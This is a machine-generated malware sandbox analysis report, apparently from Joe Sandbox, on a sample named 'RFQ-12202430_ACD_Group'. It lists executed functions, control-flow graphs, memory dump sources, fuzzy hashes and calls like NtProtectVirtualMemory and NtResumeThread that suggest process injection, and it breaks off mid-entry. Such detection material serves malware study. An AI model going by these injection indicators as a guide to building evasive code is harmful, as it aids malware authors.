VirtualAlloc 57755->57756 57758 63b0f89 57756->57758 57758->57747

                                                          Executed Functions

                                                          Function 063B6D47 Relevance: 2.6, Strings: 1, Instructions: 1354COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 63b6d47-63b6d49 1 63b6d4b-63b6d96 0->1 2 63b6ce3-63b6cf8 0->2 3 63b6d98 1->3 4 63b6d9d-63b6ebf 1->4 3->4 9 63b6ee3-63b6eef 4->9 10 63b6ec1-63b6ed7 4->10 11 63b6ef1 9->11 12 63b6ef6-63b6efb 9->12 287 63b6edd call 63b98f8 10->287 288 63b6edd call 63b98e8 10->288 11->12 14 63b6efd-63b6f09 12->14 15 63b6f33-63b6f7c 12->15 16 63b6f0b 14->16 17 63b6f10-63b6f2e 14->17 23 63b6f7e 15->23 24 63b6f83-63b6fc6 15->24 16->17 18 63b8697-63b869d 17->18 20 63b86c8 18->20 21 63b869f-63b86bf 18->21 21->20 23->24 29 63b6fd2-63b7248 24->29 50 63b7c78-63b7c84 29->50 51 63b7c8a-63b7cc2 50->51 52 63b724d-63b7259 50->52 61 63b7d9c-63b7da2 51->61 53 63b725b 52->53 54 63b7260-63b7385 52->54 53->54 89 63b7387-63b73bf 54->89 90 63b73c5-63b744e 54->90 62 63b7da8-63b7de0 61->62 63 63b7cc7-63b7d44 61->63 73 63b813e-63b8144 62->73 78 63b7d77-63b7d99 63->78 79 63b7d46-63b7d4a 63->79 76 63b814a-63b8192 73->76 77 63b7de5-63b7fe7 73->77 84 63b820d-63b8258 76->84 85 63b8194-63b8207 76->85 170 63b7fed-63b8081 77->170 171 63b8086-63b808a 77->171 78->61 79->78 82 63b7d4c-63b7d74 79->82 82->78 108 63b8661-63b8667 84->108 85->84 89->90 117 63b745d-63b74e1 90->117 118 63b7450-63b7458 90->118 110 63b825d-63b82df 108->110 111 63b866d-63b8695 108->111 130 63b82e1-63b82fc 110->130 131 63b8307-63b8313 110->131 111->18 144 63b74e3-63b74eb 117->144 145 63b74f0-63b7574 117->145 120 63b7c69-63b7c75 118->120 120->50 130->131 133 63b831a-63b8326 131->133 134 63b8315 131->134 135 63b8339-63b8348 133->135 136 63b8328-63b8334 133->136 134->133 141 63b834a 135->141 142 63b8351-63b8629 135->142 140 63b8648-63b865e 136->140 140->108 141->142 146 63b851e-63b8586 141->146 147 63b8442-63b84ab 141->147 148 63b84b0-63b8519 141->148 149 63b8357-63b83c0 141->149 150 63b83c5-63b843d 141->150 177 63b8634-63b8640 142->177 144->120 193 63b7583-63b7607 145->193 194 63b7576-63b757e 145->194 182 63b85fa-63b8600 146->182 147->177 148->177 149->177 150->177 195 63b8125-63b813b 170->195 178 63b808c-63b80e5 171->178 179 63b80e7-63b8124 171->179 177->140 178->195 179->195 186 63b8588-63b85e6 182->186 187 63b8602-63b860c 182->187 198 63b85e8 186->198 199 63b85ed-63b85f7 186->199 187->177 208 63b7609-63b7611 193->208 209 63b7616-63b769a 193->209 194->120 195->73 198->199 199->182 208->120 215 63b76a9-63b772d 209->215 216 63b769c-63b76a4 209->216 222 63b772f-63b7737 215->222 223 63b773c-63b77c0 215->223 216->120 222->120 229 63b77cf-63b7853 223->229 230 63b77c2-63b77ca 223->230 236 63b7862-63b78e6 229->236 237 63b7855-63b785d 229->237 230->120 243 63b78e8-63b78f0 236->243 244 63b78f5-63b7979 236->244 237->120 243->120 250 63b797b-63b7983 244->250 251 63b7988-63b7a0c 244->251 250->120 257 63b7a1b-63b7a9f 251->257 258 63b7a0e-63b7a16 251->258 264 63b7aae-63b7b32 257->264 265 63b7aa1-63b7aa9 257->265 258->120 271 63b7b41-63b7bc5 264->271 272 63b7b34-63b7b3c 264->272 265->120 278 63b7bc7-63b7bcf 271->278 279 63b7bd4-63b7c58 271->279 272->120 278->120 285 63b7c5a-63b7c62 279->285 286 63b7c64-63b7c66 279->286 285->120 286->120 287->9 288->9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2
                                                          • API String ID: 0-450215437
                                                          • Opcode ID: 45056a7f34902db0faf2f811ea1a2d8064d7553e328423eb0a9514264d3e815f
                                                          • Instruction ID: 1bce33eddf874e51f62eaedb50247e031c755de09dbc8172da9f72c153ac3687
                                                          • Opcode Fuzzy Hash: 45056a7f34902db0faf2f811ea1a2d8064d7553e328423eb0a9514264d3e815f
                                                          • Instruction Fuzzy Hash: A4E2D474E112288FDB64DF68D88479ABBF6FB89305F1091E9D509A7394DB349E81CF80
                                                          Function 065C4660 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4
                                                          • API String ID: 0-4088798008
                                                          • Opcode ID: d20b3d63c15793a87922d0bb63ead197e50b54426ed6d273f4446d225d882497
                                                          • Instruction ID: f238417cc21fb109438df88f81940ef4ba2e93bf8ef554810341dcb3d11bd15a
                                                          • Opcode Fuzzy Hash: d20b3d63c15793a87922d0bb63ead197e50b54426ed6d273f4446d225d882497
                                                          • Instruction Fuzzy Hash: 1BB2D334A00218CFDB54CFA8C894FADB7B6FB88710F1585A9E505AB3A5DB71AD81CF50
                                                          Function 065DE760 Relevance: 1.9, Strings: 1, Instructions: 614COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 720 65de760-65de781 721 65de788-65de818 call 65df2b3 720->721 722 65de783 720->722 727 65de81e-65de85b 721->727 722->721 729 65de85d-65de868 727->729 730 65de86a 727->730 731 65de874-65de98f 729->731 730->731 742 65de9a1-65de9cc 731->742 743 65de991-65de997 731->743 744 65df192-65df1ae 742->744 743->742 745 65df1b4-65df1cf 744->745 746 65de9d1-65deb34 call 65dd5a0 744->746 757 65deb46-65decd5 call 65dab18 call 65d74e8 746->757 758 65deb36-65deb3c 746->758 770 65ded3a-65ded44 757->770 771 65decd7-65decdb 757->771 758->757 774 65def6b-65def8a 770->774 772 65decdd-65decde 771->772 773 65dece3-65ded35 771->773 775 65df010-65df07b 772->775 773->775 776 65ded49-65dee8f call 65dd5a0 774->776 777 65def90-65defba 774->777 794 65df08d-65df0d8 775->794 795 65df07d-65df083 775->795 806 65dee95-65def61 call 65dd5a0 776->806 807 65def64-65def65 776->807 783 65df00d-65df00e 777->783 784 65defbc-65df00a 777->784 783->775 784->783 797 65df0de-65df176 794->797 798 65df177-65df18f 794->798 795->794 797->798 798->744 806->807 807->774
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480079740.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8
                                                          • API String ID: 0-4194326291
                                                          • Opcode ID: 88a6b6261a85efa514c6add1d28fc8be7bc86f0438628fa0f2a29eea0dbc4420
                                                          • Instruction ID: 3bf9b4cd152661b0365beb8b483bfb988074b75511ded3f28b71ce77c40a9942
                                                          • Opcode Fuzzy Hash: 88a6b6261a85efa514c6add1d28fc8be7bc86f0438628fa0f2a29eea0dbc4420
                                                          • Instruction Fuzzy Hash: C952C575E012298FDBA4DF68CC50AD9B7B2FB89300F1486A9D909B7350DB356E85CF90
                                                          Function 065C4987 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4
                                                          • API String ID: 0-4088798008
                                                          • Opcode ID: b95846eda4bbbf68fcde535eff6bd80a3785457741d89d39bab0193cccda94df
                                                          • Instruction ID: 1b0c60886bc54c639169f95161dfac9a803cd45ba9fa8c26fe2be9c08c501713
                                                          • Opcode Fuzzy Hash: b95846eda4bbbf68fcde535eff6bd80a3785457741d89d39bab0193cccda94df
                                                          • Instruction Fuzzy Hash: 6A220934A00219CFDB54CFA4C894BADB7B6FF88314F1581A9E509AB3A5DB71AD81CF50
                                                          Function 065C0006 Relevance: 1.7, Strings: 1, Instructions: 474COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1201 65c0006-65c006b 1204 65c006d 1201->1204 1205 65c0072-65c00c4 1201->1205 1204->1205 1208 65c00c7-65c00cd 1205->1208 1209 65c00cf 1208->1209 1210 65c00d6-65c00d7 1208->1210 1209->1210 1211 65c012c-65c0138 1209->1211 1212 65c019e-65c01cd 1209->1212 1213 65c01cf-65c0265 1209->1213 1214 65c0139-65c017a 1209->1214 1215 65c00d9-65c00e9 1209->1215 1216 65c026a-65c0317 1209->1216 1217 65c032a-65c03f1 1209->1217 1218 65c0402-65c0447 1209->1218 1210->1211 1235 65c018c-65c0192 1212->1235 1213->1235 1214->1235 1236 65c017c-65c0184 1214->1236 1232 65c00f5-65c0120 1215->1232 1216->1235 1256 65c031d-65c0325 1216->1256 1217->1235 1260 65c03f7-65c03fd 1217->1260 1237 65c0449-65c044f 1218->1237 1238 65c0451-65c0456 1218->1238 1232->1208 1233 65c0122-65c012a 1232->1233 1233->1208 1241 65c019b-65c019c 1235->1241 1242 65c0194 1235->1242 1236->1235 1237->1238 1243 65c0458-65c0459 1238->1243 1244 65c045b-65c04a9 1238->1244 1241->1212 1242->1212 1242->1213 1242->1216 1242->1217 1242->1218 1242->1241 1243->1244 1254 65c04ab-65c04b1 1244->1254 1255 65c04b3-65c04b8 1244->1255 1254->1255 1258 65c04bd-65c04e0 call 65c0e19 1255->1258 1259 65c04ba-65c04bb 1255->1259 1256->1235 1262 65c04e6-65c04fd 1258->1262 1259->1258 1260->1235 1263 65c04ff-65c0507 1262->1263 1264 65c0509-65c050f 1262->1264 1263->1264 1265 65c0518-65c0519 1264->1265 1266 65c0511 1264->1266 1274 65c05b6-65c05d3 1265->1274 1266->1265 1267 65c08bc-65c08bd 1266->1267 1268 65c06cd-65c0719 1266->1268 1269 65c051e-65c0541 1266->1269 1270 65c0609-65c064e 1266->1270 1271 65c065a 1266->1271 1272 65c054b-65c05a3 1266->1272 1273 65c0795-65c07e3 1266->1273 1266->1274 1275 65c0726-65c0727 1266->1275 1276 65c0861-65c08ad 1266->1276 1277 65c07f2-65c07f3 1266->1277 1292 65c08be 1267->1292 1288 65c06b8-65c06c1 1268->1288 1313 65c071b-65c0724 1268->1313 1269->1264 1278 65c0543-65c0549 1269->1278 1296 65c05f7-65c05fd 1270->1296 1309 65c0650-65c0658 1270->1309 1280 65c065b 1271->1280 1272->1264 1311 65c05a9-65c05b1 1272->1311 1291 65c0780-65c0789 1273->1291 1312 65c07e5-65c07f0 1273->1312 1274->1280 1289 65c05d9-65c05ed 1274->1289 1275->1291 1297 65c084c-65c0855 1276->1297 1310 65c08af-65c08ba 1276->1310 1277->1297 1278->1264 1280->1288 1293 65c06ca-65c06cb 1288->1293 1294 65c06c3 1288->1294 1295 65c05ef-65c05f5 1289->1295 1289->1296 1299 65c078b 1291->1299 1300 65c0792-65c0793 1291->1300 1292->1292 1293->1268 1293->1275 1294->1267 1294->1268 1294->1273 1294->1275 1294->1276 1294->1277 1295->1296 1304 65c05ff 1296->1304 1305 65c0606-65c0607 1296->1305 1307 65c085e-65c085f 1297->1307 1308 65c0857 1297->1308 1299->1267 1299->1273 1299->1276 1299->1277 1300->1273 1304->1267 1304->1268 1304->1270 1304->1271 1304->1273 1304->1275 1304->1276 1304->1277 1304->1305 1305->1270 1307->1276 1308->1267 1308->1276 1309->1296 1310->1297 1311->1264 1312->1291 1313->1288
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,+>2
                                                          • API String ID: 0-1990863974
                                                          • Opcode ID: 3c23b0cee3ebe5899a14f5998a65fd10f20297631eeace41ccaa1c92df5a324b
                                                          • Instruction ID: 3d9fee42269700a1174e177d47220a7e8db2b6613d452f8564d66c725b71da66
                                                          • Opcode Fuzzy Hash: 3c23b0cee3ebe5899a14f5998a65fd10f20297631eeace41ccaa1c92df5a324b
                                                          • Instruction Fuzzy Hash: 60220374E05218CFDBA4CFA9D884BAABBF2FB89310F1080A9D509A7394DB755D85CF50
                                                          Function 065C0040 Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1315 65c0040-65c006b 1316 65c006d 1315->1316 1317 65c0072-65c00c4 1315->1317 1316->1317 1320 65c00c7-65c00cd 1317->1320 1321 65c00cf 1320->1321 1322 65c00d6-65c00d7 1320->1322 1321->1322 1323 65c012c-65c0138 1321->1323 1324 65c019e-65c01cd 1321->1324 1325 65c01cf-65c0265 1321->1325 1326 65c0139-65c017a 1321->1326 1327 65c00d9-65c00e9 1321->1327 1328 65c026a-65c0317 1321->1328 1329 65c032a-65c03f1 1321->1329 1330 65c0402-65c0447 1321->1330 1322->1323 1347 65c018c-65c0192 1324->1347 1325->1347 1326->1347 1348 65c017c-65c0184 1326->1348 1344 65c00f5-65c0120 1327->1344 1328->1347 1368 65c031d-65c0325 1328->1368 1329->1347 1372 65c03f7-65c03fd 1329->1372 1349 65c0449-65c044f 1330->1349 1350 65c0451-65c0456 1330->1350 1344->1320 1345 65c0122-65c012a 1344->1345 1345->1320 1353 65c019b-65c019c 1347->1353 1354 65c0194 1347->1354 1348->1347 1349->1350 1355 65c0458-65c0459 1350->1355 1356 65c045b-65c04a9 1350->1356 1353->1324 1354->1324 1354->1325 1354->1328 1354->1329 1354->1330 1354->1353 1355->1356 1366 65c04ab-65c04b1 1356->1366 1367 65c04b3-65c04b8 1356->1367 1366->1367 1370 65c04bd-65c04e0 call 65c0e19 1367->1370 1371 65c04ba-65c04bb 1367->1371 1368->1347 1374 65c04e6-65c04fd 1370->1374 1371->1370 1372->1347 1375 65c04ff-65c0507 1374->1375 1376 65c0509-65c050f 1374->1376 1375->1376 1377 65c0518-65c0519 1376->1377 1378 65c0511 1376->1378 1386 65c05b6-65c05d3 1377->1386 1378->1377 1379 65c08bc-65c08bd 1378->1379 1380 65c06cd-65c0719 1378->1380 1381 65c051e-65c0541 1378->1381 1382 65c0609-65c064e 1378->1382 1383 65c065a 1378->1383 1384 65c054b-65c05a3 1378->1384 1385 65c0795-65c07e3 1378->1385 1378->1386 1387 65c0726-65c0727 1378->1387 1388 65c0861-65c08ad 1378->1388 1389 65c07f2-65c07f3 1378->1389 1404 65c08be 1379->1404 1400 65c06b8-65c06c1 1380->1400 1425 65c071b-65c0724 1380->1425 1381->1376 1390 65c0543-65c0549 1381->1390 1408 65c05f7-65c05fd 1382->1408 1421 65c0650-65c0658 1382->1421 1392 65c065b 1383->1392 1384->1376 1423 65c05a9-65c05b1 1384->1423 1403 65c0780-65c0789 1385->1403 1424 65c07e5-65c07f0 1385->1424 1386->1392 1401 65c05d9-65c05ed 1386->1401 1387->1403 1409 65c084c-65c0855 1388->1409 1422 65c08af-65c08ba 1388->1422 1389->1409 1390->1376 1392->1400 1405 65c06ca-65c06cb 1400->1405 1406 65c06c3 1400->1406 1407 65c05ef-65c05f5 1401->1407 1401->1408 1411 65c078b 1403->1411 1412 65c0792-65c0793 1403->1412 1404->1404 1405->1380 1405->1387 1406->1379 1406->1380 1406->1385 1406->1387 1406->1388 1406->1389 1407->1408 1416 65c05ff 1408->1416 1417 65c0606-65c0607 1408->1417 1419 65c085e-65c085f 1409->1419 1420 65c0857 1409->1420 1411->1379 1411->1385 1411->1388 1411->1389 1412->1385 1416->1379 1416->1380 1416->1382 1416->1383 1416->1385 1416->1387 1416->1388 1416->1389 1416->1417 1417->1382 1419->1388 1420->1379 1420->1388 1421->1408 1422->1409 1423->1376 1424->1403 1425->1400
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,+>2
                                                          • API String ID: 0-1990863974
                                                          • Opcode ID: c32fd8e9766bbbab34e4915657d35f79019de4f23fc4118ef3b6fd762f91e502
                                                          • Instruction ID: e589f82747acf53daa0a2f67519263f4e9363888b8cc09e3b82b5cc5c495077c
                                                          • Opcode Fuzzy Hash: c32fd8e9766bbbab34e4915657d35f79019de4f23fc4118ef3b6fd762f91e502
                                                          • Instruction Fuzzy Hash: 1E22F074E05218CFDBA4CFA9D884BAAB7F2FB89310F1084A9D509A7394DB755D85CF80
                                                          Function 066D2583 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 066D263D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: b9be0b165697b239576df9e4518596110ccba3f3ac7c4eb473549bacf7938d99
                                                          • Instruction ID: 8e3a9416251e9213e8318127c79368b211e2bf005fcef4df24c2300d092d2c3e
                                                          • Opcode Fuzzy Hash: b9be0b165697b239576df9e4518596110ccba3f3ac7c4eb473549bacf7938d99
                                                          • Instruction Fuzzy Hash: 6941A8B4D00258DFCF10CFAAD880ADEFBB5BB09310F14902AE914B7210D735A902CFA8
                                                          Function 066D2588 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 066D263D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 7006cc7f6552d5d4c7e4301592f60cdd9293fdf711e57aabed957999decb46bb
                                                          • Instruction ID: df746be003b257767d67c6f90743fd7db0b29500fcda1981b910cdc96cefc24d
                                                          • Opcode Fuzzy Hash: 7006cc7f6552d5d4c7e4301592f60cdd9293fdf711e57aabed957999decb46bb
                                                          • Instruction Fuzzy Hash: 724178B5D00258DFCF10CFAAD980ADEFBB5BB49310F14942AE915B7210D735A946CFA8
                                                          Function 066D4E99 Relevance: 1.6, APIs: 1, Instructions: 87nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 066D4F2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: bdf91fb0e72e040e4155318a2e6ab5a4dba6c9bc2635e90661c865f742c62a24
                                                          • Instruction ID: cd7862bf5af63fc290fab85226876b61a82dfbb8f35b0df7d4c75d0a11a75ffb
                                                          • Opcode Fuzzy Hash: bdf91fb0e72e040e4155318a2e6ab5a4dba6c9bc2635e90661c865f742c62a24
                                                          • Instruction Fuzzy Hash: BB319BB5D012189FDB14CFA9D980A9EFBF5BB49310F14942AE814B7210C775A946CF94
                                                          Function 066D4EA0 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 066D4F2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: c3517ebe23aacc028ca4d135674b146a8b4ebbbebfdb0175c1d217d2653c3451
                                                          • Instruction ID: d9b476cfc820a47bbb57c1e8eb00d616961dfc9ae8c5cfa50cfda78a509afbc2
                                                          • Opcode Fuzzy Hash: c3517ebe23aacc028ca4d135674b146a8b4ebbbebfdb0175c1d217d2653c3451
                                                          • Instruction Fuzzy Hash: 9D31AAB4D012189FDB10CFAAD980A9EFBF5BB49310F14942AE814B7310C775A906CF94
                                                          Function 065DE750 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480079740.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: h
                                                          • API String ID: 0-2439710439
                                                          • Opcode ID: c13de5f77fe31555d4b0c31e3e88fac39b45305e5031fd65ad4512fd8c382766
                                                          • Instruction ID: fbcd2edfb6c08c86ba73e8e1d4c3c21ac948fe7937eb797668b2ba87aec103dd
                                                          • Opcode Fuzzy Hash: c13de5f77fe31555d4b0c31e3e88fac39b45305e5031fd65ad4512fd8c382766
                                                          • Instruction Fuzzy Hash: 5871F871D016298FEBA4DF69CC50AD9B7B2FF89300F1086AAD909B7250DB305E85CF90
                                                          Function 063B4950 Relevance: 1.0, Instructions: 983COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a5aba2ba68682360b53a36a5fb1917e06f3bb974eddb7298066e6013f78198a
                                                          • Instruction ID: 325863bd7b0dcfe4d066621f4e31fc0844c12d8702c9a5c8fb360b53e317c9cd
                                                          • Opcode Fuzzy Hash: 2a5aba2ba68682360b53a36a5fb1917e06f3bb974eddb7298066e6013f78198a
                                                          • Instruction Fuzzy Hash: D5A2A475A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E85CF40
                                                          Function 065F4318 Relevance: .8, Instructions: 821COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b8acb523e558e0ea11ea75a3b35496c230f88e909b5cf45b1f01858a8223903
                                                          • Instruction ID: b3d62bc2a4629dbcc0deceaf6ffbca5443b76687b242d957d585789e8d102688
                                                          • Opcode Fuzzy Hash: 0b8acb523e558e0ea11ea75a3b35496c230f88e909b5cf45b1f01858a8223903
                                                          • Instruction Fuzzy Hash: 1F627870A107059FCB99DFA9C894A6FFBF2FF88300F148529D65A97381DB30A945CB91
                                                          Function 063B86CB Relevance: .5, Instructions: 539COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c5a34d902c90ab04b89585306a94af3c9e79ce34452931bd9e0e589096873ee
                                                          • Instruction ID: d8bdf9831492ffe9fc3ea287842484f7a31bc0a1f0be23a9f9d76cdcd136d552
                                                          • Opcode Fuzzy Hash: 8c5a34d902c90ab04b89585306a94af3c9e79ce34452931bd9e0e589096873ee
                                                          • Instruction Fuzzy Hash: 8C52B574A102298FDBA4DF68CD84B9AB7B6FB49301F1095D9D90DA7391DB309E81CF90
                                                          Function 065FA438 Relevance: .3, Instructions: 326COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf0724ed8ca3afc86d613ed652c8b0b9aa2bcbc9dd3ae33e44e20d088c1750d0
                                                          • Instruction ID: e474077a8a32c5926b3ca1794868de3faca1730d41e4da8649da07d6bbbc3078
                                                          • Opcode Fuzzy Hash: bf0724ed8ca3afc86d613ed652c8b0b9aa2bcbc9dd3ae33e44e20d088c1750d0
                                                          • Instruction Fuzzy Hash: C8E1E274E15218CFEB94CF69C884BADBBF2FB89300F1084A9D60DAB255DB745985CF42
                                                          Function 065FA42A Relevance: .3, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c871ea975b7448832d11ec1ceaf37ddf168db66913923d40b0aabdfac689780a
                                                          • Instruction ID: 5fb05bf03bf2dd6f81da3486f2ebb9edb62b2d55e34f09b960b75a55d40e48c1
                                                          • Opcode Fuzzy Hash: c871ea975b7448832d11ec1ceaf37ddf168db66913923d40b0aabdfac689780a
                                                          • Instruction Fuzzy Hash: 85E10374E15218CFEB64CF69D884BADBBF2FB89300F1080A9D509AB255DB745D85CF42
                                                          Function 065F9752 Relevance: .3, Instructions: 299COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7666ec55b023937c342ffae3df9653ff60779f14c05c5e8ab22a9e60cdb9b3b
                                                          • Instruction ID: e05751b131949a8076aef492f2e00d9720341aea25d214c38633bc15bcb825f5
                                                          • Opcode Fuzzy Hash: d7666ec55b023937c342ffae3df9653ff60779f14c05c5e8ab22a9e60cdb9b3b
                                                          • Instruction Fuzzy Hash: D5D11775E11218DFEB98CFA5D994BADBBF6FB89300F1080A9D509AB290CB745D85CF40
                                                          Function 065F9760 Relevance: .3, Instructions: 293COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c28e84a704b42e767ea6a57f45fdbd1d536ba0bade9e778a5c82108d4043779a
                                                          • Instruction ID: 384491d21bb376c8b9c2e00a214afbbb5cbae633c725a0e1d3571920c18e9391
                                                          • Opcode Fuzzy Hash: c28e84a704b42e767ea6a57f45fdbd1d536ba0bade9e778a5c82108d4043779a
